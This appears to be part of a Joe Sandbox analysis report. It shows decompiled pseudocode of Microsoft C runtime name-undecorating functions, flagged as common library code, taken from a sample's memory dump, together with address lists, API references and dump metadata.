				signed int _t238;
				signed int* _t241;
				void* _t244;
				void* _t256;

				_t219 =  *0x456018; // 0x0
				_t144 =  *_t219;
				if(_t144 == 0) {
					E0040AE84(_t219, _a4, 1, _a8);
					L92:
					_t146 = _a4;
					L93:
					return _t146;
				}
				_t241 = _a8;
				_t220 = _t219 + 1;
				_t211 = _t144 & 0x000000ff;
				 *0x456018 = _t220;
				_v5 = 0;
				_v16 = 0;
				_v12 = 0;
				_t244 = 2;
				_t256 = _t211 - 0x58;
				if(_t256 > 0) {
					__eflags = _t211 - 0x5f;
					if(_t211 == 0x5f) {
						_t236 =  *_t220;
						_t41 = _t220 + 1; // 0x2
						 *0x456018 = _t41;
						_t148 = _t236 & 0x000000ff;
						_v5 = _t236;
						__eflags = _t148 - 0x4e;
						if(__eflags > 0) {
							_t149 = _t148 - 0x4f;
							__eflags = _t149 - 0xa;
							if(_t149 > 0xa) {
								L77:
								_v32 = "UNKNOWN";
								L78:
								_v28 = 7;
								L79:
								_t221 =  &_v16;
								E0040AD2C( &_v16,  &_v32);
								L80:
								_t153 = (_v5 & 0x000000ff) - 0x45;
								__eflags = _t153;
								if(_t153 == 0) {
									L85:
									_t222 =  &_v40;
									L86:
									_v32 = "unsigned ";
									_v28 = 9;
									L87:
									_t221 = E0040AA52(_t222,  &_v32);
									E0040AEC8(_t155,  &_v32,  &_v16);
									_v16 = _v32;
									_v12 = _v28;
									L88:
									if( *_t241 != 0) {
										E0040AFC2( &_v16, E0040AE59(_t221,  &_v40, 0x20, _t241));
									}
									_t146 = _a4;
									 *_t146 = _v16;
									_t146[1] = _v12;
									goto L93;
								}
								_t162 = _t153 - _t244;
								__eflags = _t162;
								if(_t162 == 0) {
									goto L85;
								}
								_t163 = _t162 - _t244;
								__eflags = _t163;
								if(_t163 == 0) {
									goto L85;
								}
								_t164 = _t163 - _t244;
								__eflags = _t164;
								if(_t164 == 0) {
									goto L85;
								}
								__eflags = _t164 != _t244;
								if(_t164 != _t244) {
									goto L88;
								}
								goto L85;
							}
							switch( *((intOrPtr*)(_t149 * 4 +  &M0040CB70))) {
								case 0:
									_push(0xfffffffe);
									_pop(_t212);
									__eflags = 0;
									L56:
									_v16 = 0;
									_t166 = _t241;
									_v12 = 0;
									_t228 =  *_t166;
									_t167 = _t166[1];
									_v32 = _t228;
									_v28 = _t167;
									__eflags = _t212 - 0xfffffffe;
									if(_t212 != 0xfffffffe) {
										__eflags = _t228;
										if(_t228 == 0) {
											_t246 = _t212 & 0x00000002;
											__eflags = _t212 & 0x00000001;
											if((_t212 & 0x00000001) == 0) {
												__eflags = _t246;
												if(_t246 != 0) {
													_v24 = "volatile";
													_v20 = 8;
													E0040AD2C( &_v16,  &_v24);
												}
											} else {
												_v24 = "const";
												_v20 = 5;
												E0040AD2C( &_v16,  &_v24);
												__eflags = _t246;
												if(_t246 != 0) {
													_v24 = " volatile";
													_v20 = 9;
													E0040AF6A( &_v16,  &_v24);
												}
											}
										}
										E0040F339(_t212, 0, _a4,  &_v16,  &_v32, 1);
										goto L92;
									}
									_v28 = _t167 | 0x00000800;
									E0040F339(_t212, 0,  &_v24,  &_v16,  &_v32, 0);
									_t238 = _v20;
									__eflags = 0x00000800 & _t238;
									if((0x00000800 & _t238) == 0) {
										_v32 = 0x449990;
										_v28 = 2;
										E0040AF6A( &_v24,  &_v32);
										_t238 = _v20;
									}
									_t232 = _v24;
									goto L76;
								case 1:
									_v32 = "auto";
									L52:
									_v28 = 4;
									goto L79;
								case 2:
									_v32 = "char8_t";
									goto L78;
								case 3:
									_v32 = "<unknown>";
									_v28 = 9;
									goto L79;
								case 4:
									_v32 = "char16_t";
									goto L48;
								case 5:
									_v32 = "decltype(auto)";
									_v28 = 0xe;
									goto L79;
								case 6:
									_v32 = "char32_t";
									L48:
									_v28 = 8;
									goto L79;
								case 7:
									__eax =  &_v24;
									_v32 = "this ";
									_v28 = 5;
									__eax = E0040EF7E(__ebx,  &_v24, __edi);
									_pop(__ecx);
									_pop(__ecx);
									__esi = __eax;
									__ecx =  &_v40;
									__eax =  &_v32;
									__eax = E0040AA52( &_v40,  &_v32);
									__ecx =  &_v32;
									__ecx = __eax;
									E0040AEC8(__ecx,  &_v32, __esi) = _v32;
									_v16 = _v32;
									__eax = _v28;
									_push(2);
									_v12 = _v28;
									_pop(__esi);
									goto L80;
								case 8:
									_v32 = "wchar_t";
									goto L78;
								case 9:
									__eax =  &_v40;
									 *0x456018 = __ecx;
									__eax = E0040D9CD( &_v40);
									__ecx =  *__eax;
									__edx =  *((intOrPtr*)(__eax + 4));
									_v16 = __ecx;
									_v12 =  *((intOrPtr*)(__eax + 4));
									__eflags = __ecx;
									if(__ecx != 0) {
										goto L80;
									}
									L76:
									_t146 = _a4;
									 *_t146 = _t232;
									_t146[1] = _t238;
									goto L93;
							}
						}
						if(__eflags == 0) {
							_v32 = "bool";
							goto L52;
						}
						__eflags = _t148 - 0x48;
						if(__eflags > 0) {
							_t184 = _t148 - 0x49;
							__eflags = _t184;
							if(_t184 == 0) {
								L50:
								_v32 = "__int32";
								goto L78;
							}
							_t185 = _t184 - 1;
							__eflags = _t185;
							if(_t185 == 0) {
								L49:
								_v32 = "__int64";
								goto L78;
							}
							_t186 = _t185 - 1;
							__eflags = _t186;
							if(_t186 == 0) {
								goto L49;
							}
							_t187 = _t186 - 1;
							__eflags = _t187;
							if(_t187 == 0) {
								L47:
								_v32 = "__int128";
								goto L48;
							}
							__eflags = _t187 != 1;
							if(_t187 != 1) {
								goto L77;
							}
							goto L47;
						}
						if(__eflags == 0) {
							goto L50;
						}
						_t189 = _t148;
						__eflags = _t189;
						if(_t189 == 0) {
							 *0x456018 = _t220;
							_t221 =  &_v16;
							E0040ADC2( &_v16, 1);
							goto L80;
						}
						_t191 = _t189 - 0x24;
						__eflags = _t191;
						if(_t191 == 0) {
							_v32 = "__w64 ";
							_v28 = 6;
							E0040AE37(_t220, _a4,  &_v32, E0040C634( &_v24, _t241));
							goto L92;
						}
						_t196 = _t191 - 0x20;
						__eflags = _t196;
						if(_t196 == 0) {
							L39:
							_v32 = "__int8";
							_v28 = 6;
							goto L79;
						}
						_t197 = _t196 - 1;
						__eflags = _t197;
						if(_t197 == 0) {
							goto L39;
						}
						_t198 = _t197 - 1;
						__eflags = _t198;
						if(_t198 == 0) {
							L38:
							_v32 = "__int16";
							goto L78;
						}
						__eflags = _t198 != 1;
						if(_t198 != 1) {
							goto L77;
						}
						goto L38;
					}
					L18:
					 *0x456018 = _t220 - 1;
					_t202 = E0040D9CD( &_v32);
					_t232 =  *_t202;
					_t238 = _t202[1];
					_v16 = _t232;
					_v12 = _t238;
					__eflags = _t232;
					if(_t232 == 0) {
						goto L76;
					}
					L19:
					_t213 = _t211 - 0x43;
					if(_t213 == 0) {
						_v32 = "signed ";
						_t222 =  &_v24;
						_v28 = 7;
						goto L87;
					}
					_t214 = _t213 - _t244;
					if(_t214 == 0) {
						L26:
						_t222 =  &_v24;
						goto L86;
					}
					_t215 = _t214 - _t244;
					if(_t215 == 0) {
						goto L26;
					}
					_t216 = _t215 - _t244;
					if(_t216 == 0) {
						goto L26;
					}
					_t217 = _t216 - _t244;
					if(_t217 == 0) {
						goto L26;
					}
					if(_t217 == 0x14) {
						goto L80;
					} else {
						goto L88;
					}
				}
				if(_t256 == 0) {
					_v32 = "void";
					_v28 = 4;
					L12:
					_t221 =  &_v16;
					E0040AD2C( &_v16,  &_v32);
					goto L88;
				}
				_t5 = _t211 - 0x43; // -67
				_t205 = _t5;
				if(_t205 > 0x10) {
					goto L18;
				}
				_t6 = _t205 + 0x40cb5c; // 0x13eb0448
				switch( *((intOrPtr*)(( *_t6 & 0x000000ff) * 4 +  &M0040CB38))) {
					case 0:
						_v32 = "char";
						goto L6;
					case 1:
						_v32 = "short";
						_v28 = 5;
						goto L7;
					case 2:
						_v32 = "int";
						_v28 = 3;
						goto L7;
					case 3:
						_v32 = "long";
						L6:
						_v28 = 4;
						L7:
						_t221 =  &_v16;
						E0040AD2C( &_v16,  &_v32);
						goto L19;
					case 4:
						_v32 = "float";
						_v28 = 5;
						goto L12;
					case 5:
						L14:
						__eax =  &_v32;
						_v32 = "double";
						__ecx =  &_v16;
						_v28 = 6;
						__eax = E0040AF6A(__ecx,  &_v32);
						goto L19;
					case 6:
						__eax =  &_v32;
						_v32 = "long ";
						__ecx =  &_v16;
						_v28 = 5;
						__eax = E0040AD2C( &_v16,  &_v32);
						goto L14;
					case 7:
						__ebx = __ebx & 0x00000003;
						goto L56;
					case 8:
						goto L18;
				}
			}

0x0040c637
0x0040c640
0x0040c647
0x0040cb25
0x0040cb2d
0x0040cb2d
0x0040cb30
0x0040cb34
0x0040cb34
0x0040c64d
0x0040c652
0x0040c653
0x0040c656
0x0040c65c
0x0040c65f
0x0040c662
0x0040c667
0x0040c668
0x0040c66b
0x0040c746
0x0040c749
0x0040c7b1
0x0040c7b3
0x0040c7b6
0x0040c7bb
0x0040c7be
0x0040c7c1
0x0040c7c4
0x0040c8bd
0x0040c8c0
0x0040c8c3
0x0040ca88
0x0040ca88
0x0040ca8f
0x0040ca8f
0x0040ca96
0x0040ca9a
0x0040ca9d
0x0040caa2
0x0040caa6
0x0040caa6
0x0040caa9
0x0040cabb
0x0040cabb
0x0040cabe
0x0040cabe
0x0040cac5
0x0040cacc
0x0040cadd
0x0040cadf
0x0040cae7
0x0040caed
0x0040caf0
0x0040caf3
0x0040cb08
0x0040cb08
0x0040cb0d
0x0040cb13
0x0040cb18
0x00000000
0x0040cb18
0x0040caab
0x0040caab
0x0040caad
0x00000000
0x00000000
0x0040caaf
0x0040caaf
0x0040cab1
0x00000000
0x00000000
0x0040cab3
0x0040cab3
0x0040cab5
0x00000000
0x00000000
0x0040cab7
0x0040cab9
0x00000000
0x00000000
0x00000000
0x0040cab9
0x0040c8c9
0x00000000
0x0040c8d0
0x0040c8d2
0x0040c8d3
0x0040c8d5
0x0040c8d5
0x0040c8d8
0x0040c8da
0x0040c8dd
0x0040c8df
0x0040c8e2
0x0040c8e5
0x0040c8e8
0x0040c8eb
0x0040c938
0x0040c93a
0x0040c93e
0x0040c941
0x0040c944
0x0040c980
0x0040c982
0x0040c987
0x0040c992
0x0040c999
0x0040c999
0x0040c946
0x0040c949
0x0040c954
0x0040c95b
0x0040c960
0x0040c962
0x0040c967
0x0040c972
0x0040c979
0x0040c979
0x0040c962
0x0040c944
0x0040c9ab
0x00000000
0x0040c9b0
0x0040c8f4
0x0040c904
0x0040c909
0x0040c90f
0x0040c911
0x0040c916
0x0040c921
0x0040c928
0x0040c92d
0x0040c92d
0x0040c930
0x00000000
0x00000000
0x0040c9fb
0x0040c8b1
0x0040c8b1
0x00000000
0x00000000
0x0040c9cb
0x00000000
0x00000000
0x0040c9b8
0x0040c9bf
0x00000000
0x00000000
0x0040c9d7
0x00000000
0x00000000
0x0040ca07
0x0040ca0e
0x00000000
0x00000000
0x0040c9e3
0x0040c886
0x0040c886
0x00000000
0x00000000
0x0040ca17
0x0040ca1a
0x0040ca23
0x0040ca2a
0x0040ca2f
0x0040ca30
0x0040ca31
0x0040ca33
0x0040ca36
0x0040ca3a
0x0040ca40
0x0040ca44
0x0040ca4b
0x0040ca4e
0x0040ca51
0x0040ca54
0x0040ca56
0x0040ca59
0x00000000
0x00000000
0x0040c9ef
0x00000000
0x00000000
0x0040ca5c
0x0040ca5f
0x0040ca66
0x0040ca6c
0x0040ca6e
0x0040ca71
0x0040ca74
0x0040ca77
0x0040ca79
0x00000000
0x00000000
0x0040ca7b
0x0040ca7b
0x0040ca7e
0x0040ca80
0x00000000
0x00000000
0x0040c8c9
0x0040c7ca
0x0040c8aa
0x00000000
0x0040c8aa
0x0040c7d0
0x0040c7d3
0x0040c862
0x0040c862
0x0040c865
0x0040c89e
0x0040c89e
0x00000000
0x0040c89e
0x0040c867
0x0040c867
0x0040c86a
0x0040c892
0x0040c892
0x00000000
0x0040c892
0x0040c86c
0x0040c86c
0x0040c86f
0x00000000
0x00000000
0x0040c871
0x0040c871
0x0040c874
0x0040c87f
0x0040c87f
0x00000000
0x0040c87f
0x0040c876
0x0040c879
0x00000000
0x00000000
0x00000000
0x0040c879
0x0040c7d9
0x00000000
0x00000000
0x0040c7df
0x0040c7df
0x0040c7e2
0x0040c84d
0x0040c853
0x0040c858
0x00000000
0x0040c858
0x0040c7e4
0x0040c7e4
0x0040c7e7
0x0040c823
0x0040c82c
0x0040c840
0x00000000
0x0040c845
0x0040c7e9
0x0040c7e9
0x0040c7ec
0x0040c80d
0x0040c80d
0x0040c814
0x00000000
0x0040c814
0x0040c7ee
0x0040c7ee
0x0040c7f1
0x00000000
0x00000000
0x0040c7f3
0x0040c7f3
0x0040c7f6
0x0040c801
0x0040c801
0x00000000
0x0040c801
0x0040c7f8
0x0040c7fb
0x00000000
0x00000000
0x00000000
0x0040c7fb
0x0040c74b
0x0040c74e
0x0040c757
0x0040c75d
0x0040c75f
0x0040c762
0x0040c765
0x0040c768
0x0040c76a
0x00000000
0x00000000
0x0040c770
0x0040c770
0x0040c773
0x0040c79b
0x0040c7a2
0x0040c7a5
0x00000000
0x0040c7a5
0x0040c775
0x0040c777
0x0040c793
0x0040c793
0x00000000
0x0040c793
0x0040c779
0x0040c77b
0x00000000
0x00000000
0x0040c77d
0x0040c77f
0x00000000
0x00000000
0x0040c781
0x0040c783
0x00000000
0x00000000
0x0040c788
0x00000000
0x0040c78e
0x00000000
0x0040c78e
0x0040c788
0x0040c671
0x0040c736
0x0040c73d
0x0040c6e7
0x0040c6eb
0x0040c6ee
0x00000000
0x0040c6ee
0x0040c677
0x0040c677
0x0040c67d
0x00000000
0x00000000
0x0040c683
0x0040c68a
0x00000000
0x0040c691
0x00000000
0x00000000
0x0040c6b0
0x0040c6b7
0x00000000
0x00000000
0x0040c6c0
0x0040c6c7
0x00000000
0x00000000
0x0040c6d0
0x0040c698
0x0040c698
0x0040c69f
0x0040c6a3
0x0040c6a6
0x00000000
0x00000000
0x0040c6d9
0x0040c6e0
0x00000000
0x00000000
0x0040c712
0x0040c712
0x0040c715
0x0040c71d
0x0040c720
0x0040c727
0x00000000
0x00000000
0x0040c6f8
0x0040c6fb
0x0040c703
0x0040c706
0x0040c70d
0x00000000
0x00000000
0x0040c72e
0x00000000
0x00000000
0x00000000
0x00000000

APIs

shared_ptr.LIBCMT ref: 0040C6A6
shared_ptr.LIBCMT ref: 0040C6EE
shared_ptr.LIBCMT ref: 0040C70D
operator+.LIBVCRUNTIME ref: 0040C840
DName::operator=.LIBVCRUNTIME ref: 0040C858
shared_ptr.LIBCMT ref: 0040CA9D
DName::operator+.LIBCMT ref: 0040CADF
operator+.LIBVCRUNTIME ref: 0040CB25

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: shared_ptr$operator+$Name::operator+Name::operator=
String ID:
API String ID: 1464150960-0
Opcode ID: 4e588816def2473de3532d427ac57e076b5fa858d07146eaa684bf9788cb3ee1
Instruction ID: 565ee6dc63303891a297d6856fd261c6a6622532c9dfa5a5601f1566cd167841
Opcode Fuzzy Hash: 4e588816def2473de3532d427ac57e076b5fa858d07146eaa684bf9788cb3ee1
Instruction Fuzzy Hash: C8E13BB1D0420ADBDB14DFA5C489AEEBBB4AB04304F10826BD411B73C1D77D9A49DF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041008D Relevance: 15.3, APIs: 10, Instructions: 301
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E0041008D(intOrPtr _a4) {
				signed int _v8;
				long _v24;
				signed int _v28;
				wchar_t** _v32;
				char _v36;
				char _v40;
				char _v48;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t65;
				signed int* _t67;
				signed int _t68;
				void* _t69;
				signed int _t76;
				signed int _t93;
				signed int _t95;
				signed int _t97;
				signed int _t99;
				signed int _t101;
				signed int _t102;
				signed int _t108;
				void* _t110;
				void* _t112;
				void* _t119;
				void* _t122;
				intOrPtr _t126;
				signed int _t152;
				void* _t153;
				void* _t154;
				signed int _t155;
				signed int _t156;
				void* _t157;
				void* _t158;

				_t65 =  *0x454264; // 0x8c4320d5
				_v8 = _t65 ^ _t156;
				_t67 =  *0x456018; // 0x0
				_t126 = _a4;
				_t3 =  &(_t67[0]); // 0x1
				_t152 = _t3;
				_t155 =  *_t67;
				_t68 = _t155;
				 *0x456018 = _t152;
				_v28 = _t155;
				_push(_t153);
				_t157 = _t68 - 0x46;
				if(_t157 > 0) {
					_t69 = _t68 - 0x47;
					__eflags = _t69 - 0xf;
					if(_t69 > 0xf) {
						goto L66;
					} else {
						switch( *((intOrPtr*)(( *(_t69 + 0x410455) & 0x000000ff) * 4 +  &M00410435))) {
							case 0:
								goto L34;
							case 1:
								 &_v32 = E00410465(__edx, __edi, __esi,  &_v32);
								__eflags = _v28 - 1;
								if(_v28 > 1) {
									goto L66;
								} else {
									__eax = E0041008D(__ebx);
									goto L11;
								}
								goto L68;
							case 2:
								_v32 = "nullptr";
								_v28 = 7;
								goto L16;
							case 3:
								 &_v48 = E0040D858(__edx,  &_v48, 0);
								_pop(__ecx);
								_pop(__ecx);
								_v32 = "lambda";
								_v28 = 6;
								goto L16;
							case 4:
								goto L66;
							case 5:
								 &_v40 = E0040FA6B(__edx,  &_v40);
								__eax = 0;
								__edi =  &_v24;
								asm("stosd");
								_pop(__ecx);
								__ecx =  &_v40;
								asm("stosd");
								asm("stosd");
								asm("stosd");
								 &_v24 = E0040FAFA(__ecx,  &_v24, 0x10);
								__eax =  &_v24;
								__eax = E0042BCF9(__ecx,  &_v24);
								__eflags =  *0x456020 & 0x00004000;
								__esi = __eax;
								if(( *0x456020 & 0x00004000) == 0) {
									L53:
									__esi = __esi & 0x00000fff;
									 &_v24 = swprintf( &_v24, 0x10, "%d", __esi);
									_v36 = 0;
									__eax =  &_v24;
									__ecx =  &_v40;
									_push(_v36);
									E0040A529(__ecx,  &_v24) = _v28;
									__eax = _v28 - 0x52;
									__eflags = __eax;
									if(__eax == 0) {
										L61:
										_v32 = "`template-type-parameter-";
										goto L60;
									} else {
										__eax = __eax - 1;
										__eax = __eax - 1;
										__eflags = __eax;
										if(__eax == 0) {
											goto L61;
										} else {
											__eax = __eax - 1;
											__eflags = __eax;
											if(__eax == 0) {
												_v32 = "`generic-class-parameter-";
												L60:
												_v28 = 0x19;
												goto L58;
											} else {
												__eax = __eax - 1;
												__eflags = __eax;
												if(__eax != 0) {
													goto L66;
												} else {
													_v32 = "`generic-method-parameter-";
													_v28 = 0x1a;
													L58:
													__eax =  &_v32;
													__ecx =  &_v48;
													__eax = E0040AA52( &_v48,  &_v32);
													 &_v40 =  &_v32;
													__ecx = __eax;
													__eax = E0040AEC8(__ecx,  &_v32,  &_v40);
													_push(0x27);
													goto L47;
												}
											}
										}
									}
								} else {
									__edi =  *0x456028; // 0x0
									__eflags = __edi;
									if(__edi == 0) {
										goto L53;
									} else {
										__eax = __eax & 0x00000fff;
										__ecx = __edi;
										_push(__eax);
										__eax =  *0x4492c4();
										__eax =  *__edi();
										_pop(__ecx);
										__eflags = __eax;
										if(__eax == 0) {
											goto L53;
										} else {
											_v36 = 0;
											__ecx = __ebx;
											_push(_v36);
											__eax = E0040A59C(__ecx, __eax);
										}
									}
								}
								goto L68;
							case 6:
								__ecx = 0;
								 *__ebx = 0;
								 *((intOrPtr*)(__ebx + 4)) = 0;
								goto L68;
						}
					}
				} else {
					if(_t157 == 0) {
						L34:
						_v32 = 0;
						_v28 = 0;
						E0040BF7E( &_v32, 0x7b);
						_t76 = _t155 - 0x48;
						__eflags = _t76;
						if(__eflags == 0) {
							L37:
							_push( &_v40);
							E0040AFC2( &_v32, E0040D604(_t126, _t152, _t153, _t155, __eflags));
							E0040B019( &_v32, 0x2c);
						} else {
							_t93 = _t76 - 1;
							__eflags = _t93;
							if(__eflags == 0) {
								goto L37;
							} else {
								__eflags = _t93 - 1;
								if(__eflags == 0) {
									goto L37;
								}
							}
						}
						_t155 = _t155 - 0x46;
						__eflags = _t155;
						if(_t155 == 0) {
							L44:
							E0040AFC2( &_v32, E0040FA6B(_t152,  &_v40));
							E0040B019( &_v32, 0x2c);
							goto L45;
						} else {
							_t155 = _t155 - 1;
							__eflags = _t155;
							if(_t155 == 0) {
								L43:
								E0040AFC2( &_v32, E0040FA6B(_t152,  &_v40));
								E0040B019( &_v32, 0x2c);
								goto L44;
							} else {
								_t155 = _t155 - 1;
								__eflags = _t155;
								if(_t155 == 0) {
									L45:
									E0040AFC2( &_v32, E0040FA6B(_t152,  &_v40));
								} else {
									_t155 = _t155 - 1;
									__eflags = _t155;
									if(_t155 == 0) {
										goto L44;
									} else {
										_t155 = _t155 - 1;
										__eflags = _t155;
										if(_t155 == 0) {
											goto L43;
										}
									}
								}
							}
						}
						_push(0x7d);
						L47:
						_push(_t126);
						E0040AEEA( &_v32);
					} else {
						_t158 = _t68 - 0x36;
						if(_t158 > 0) {
							_t95 = _t68 - 0x37;
							__eflags = _t95;
							if(_t95 == 0) {
								E00410A1F(_t152, _t153, _t155, _t126);
								goto L11;
							} else {
								_t97 = _t95 - 1;
								__eflags = _t97;
								if(_t97 == 0) {
									E0040EE8C(_t152, _t153, _t126);
									goto L11;
								} else {
									_t99 = _t97 - 9;
									__eflags = _t99;
									if(_t99 == 0) {
										L29:
										E0040DE94(_t152, _t126, _t155);
										goto L11;
									} else {
										_t101 = _t99 - 1;
										__eflags = _t101;
										if(_t101 == 0) {
											goto L29;
										} else {
											_t102 = _t101 - 1;
											__eflags = _t102;
											if(_t102 == 0) {
												E0040C2E2(_t126);
												goto L11;
											} else {
												__eflags = _t102;
												if(__eflags != 0) {
													goto L66;
												} else {
													_push(_t126);
													E0040D604(_t126, _t152, _t153, _t155, __eflags);
													goto L11;
												}
											}
										}
									}
								}
							}
						} else {
							if(_t158 == 0) {
								E0040E3C6(_t152, _t153, _t126);
								goto L11;
							} else {
								_t108 = _t68;
								if(_t108 == 0) {
									_t13 = _t152 - 1; // 0x0
									 *0x456018 = _t13;
									_push(1);
									goto L67;
								} else {
									_t110 = _t108 - 0x30;
									if(_t110 == 0) {
										E0040FA6B(_t152, _t126);
										goto L11;
									} else {
										_t112 = _t110 - 1;
										if(_t112 == 0) {
											__eflags =  *_t152 - 0x40;
											if( *_t152 != 0x40) {
												_v32 = 0;
												_v28 = 0;
												E0040BF7E( &_v32, 0x26);
												_push( &_v40);
												E0040AEC8( &_v32, _t126, E0040D604(_t126, _t152, _t153, _t155, __eflags));
											} else {
												_t152 = _t152 + 1;
												__eflags = _t152;
												_v32 = "NULL";
												 *0x456018 = _t152;
												_v28 = 4;
												L16:
												E0040AA52(_t126,  &_v32);
											}
										} else {
											_t119 = _t112 - 1;
											if(_t119 == 0) {
												E00410B98(_t152, _t153, _t155, _t126);
												goto L11;
											} else {
												_t122 = _t119;
												if(_t122 == 0) {
													E0040FCEA(_t126);
													goto L11;
												} else {
													if(_t122 != 1) {
														L66:
														_push(2);
														L67:
														E0040AAF4(_t126);
													} else {
														E0040C008(_t126);
														L11:
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L68:
				_pop(_t154);
				return E004085C2(_t126, _t126, _v8 ^ _t156, _t152, _t154, _t155);
			}

0x00410093
0x0041009a
0x0041009d
0x004100a3
0x004100a9
0x004100a9
0x004100ac
0x004100af
0x004100b1
0x004100b7
0x004100ba
0x004100bb
0x004100be
0x004101f2
0x004101f5
0x004101f8
0x00000000
0x004101fe
0x00410205
0x00000000
0x00000000
0x00000000
0x004103d0
0x004103d5
0x004103da
0x00000000
0x004103dc
0x004103dd
0x00000000
0x004103dd
0x00000000
0x00000000
0x004103e7
0x004103ee
0x00000000
0x00000000
0x00410400
0x00410405
0x00410406
0x00410407
0x0041040e
0x00000000
0x00000000
0x00000000
0x00000000
0x004102d2
0x004102d7
0x004102d9
0x004102dc
0x004102dd
0x004102e0
0x004102e3
0x004102e4
0x004102e5
0x004102ea
0x004102ef
0x004102f3
0x004102f8
0x00410302
0x00410305
0x0041033a
0x0041033a
0x0041034c
0x00410354
0x00410358
0x0041035b
0x0041035e
0x00410367
0x0041036a
0x0041036a
0x0041036d
0x004103c3
0x004103c3
0x00000000
0x0041036f
0x0041036f
0x00410370
0x00410370
0x00410373
0x00000000
0x00410375
0x00410375
0x00410375
0x00410378
0x004103b3
0x004103ba
0x004103ba
0x00000000
0x0041037a
0x0041037a
0x0041037a
0x0041037d
0x00000000
0x00410383
0x00410383
0x0041038a
0x00410391
0x00410391
0x00410395
0x00410398
0x004103a1
0x004103a5
0x004103a7
0x004103ac
0x00000000
0x004103ac
0x0041037d
0x00410378
0x00410373
0x00410307
0x00410307
0x0041030d
0x0041030f
0x00000000
0x00410311
0x00410311
0x00410316
0x00410318
0x00410319
0x0041031f
0x00410321
0x00410322
0x00410324
0x00000000
0x00410326
0x00410326
0x0041032a
0x0041032c
0x00410330
0x00410330
0x00410324
0x0041030f
0x00000000
0x00000000
0x004102c2
0x004102c4
0x004102c6
0x00000000
0x00000000
0x00410205
0x004100c4
0x004100c4
0x0041020c
0x0041020e
0x00410211
0x00410219
0x00410220
0x00410220
0x00410223
0x0041022f
0x00410232
0x0041023d
0x00410247
0x00410225
0x00410225
0x00410225
0x00410228
0x00000000
0x0041022a
0x0041022a
0x0041022d
0x00000000
0x00000000
0x0041022d
0x00410228
0x0041024c
0x0041024c
0x0041024f
0x00410282
0x00410290
0x0041029a
0x00000000
0x00410251
0x00410251
0x00410251
0x00410254
0x00410265
0x00410273
0x0041027d
0x00000000
0x00410256
0x00410256
0x00410256
0x00410259
0x0041029f
0x004102ad
0x0041025b
0x0041025b
0x0041025b
0x0041025e
0x00000000
0x00410260
0x00410260
0x00410260
0x00410263
0x00000000
0x00000000
0x00410263
0x0041025e
0x00410259
0x00410254
0x004102b2
0x004102b4
0x004102b4
0x004102b8
0x004100ca
0x004100ca
0x004100cd
0x00410196
0x00410196
0x00410199
0x004101e8
0x00000000
0x0041019b
0x0041019b
0x0041019b
0x0041019e
0x004101dd
0x00000000
0x004101a0
0x004101a0
0x004101a0
0x004101a3
0x004101cf
0x004101d1
0x00000000
0x004101a5
0x004101a5
0x004101a5
0x004101a8
0x00000000
0x004101aa
0x004101aa
0x004101aa
0x004101ad
0x004101c5
0x00000000
0x004101af
0x004101b0
0x004101b3
0x00000000
0x004101b9
0x004101b9
0x004101ba
0x00000000
0x004101ba
0x004101b3
0x004101ad
0x004101a8
0x004101a3
0x0041019e
0x004100d3
0x004100d3
0x0041018c
0x00000000
0x004100d9
0x004100db
0x004100dd
0x0041017c
0x0041017f
0x00410184
0x00000000
0x004100e3
0x004100e3
0x004100e6
0x00410175
0x00000000
0x004100ec
0x004100ec
0x004100ef
0x00410121
0x00410124
0x0041014b
0x0041014e
0x00410156
0x0041015e
0x0041016a
0x00410126
0x00410126
0x00410126
0x00410127
0x0041012e
0x00410134
0x0041013b
0x00410141
0x00410141
0x004100f1
0x004100f1
0x004100f4
0x0041011a
0x00000000
0x004100f6
0x004100f7
0x004100fa
0x00410112
0x00000000
0x004100fc
0x004100ff
0x0041041a
0x0041041a
0x0041041c
0x0041041e
0x00410105
0x00410106
0x0041010b
0x0041010b
0x004100ff
0x004100fa
0x004100f4
0x004100ef
0x004100e6
0x004100dd
0x004100d3
0x004100cd
0x004100c4
0x00410423
0x00410428
0x00410433

APIs

DName::operator+.LIBCMT ref: 0041016A
UnDecorator::getSignedDimension.LIBCMT ref: 00410175
UnDecorator::getSignedDimension.LIBCMT ref: 00410269
UnDecorator::getSignedDimension.LIBCMT ref: 00410286
UnDecorator::getSignedDimension.LIBCMT ref: 004102A3
DName::operator+.LIBCMT ref: 004102B8
UnDecorator::getSignedDimension.LIBCMT ref: 004102D2
swprintf.LIBCMT ref: 0041034C
DName::operator+.LIBCMT ref: 004103A7

Part of subcall function 0040C008: DName::DName.LIBVCRUNTIME ref: 0040C066

DName::DName.LIBVCRUNTIME ref: 0041041E

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$swprintf
String ID:
API String ID: 3689813335-0
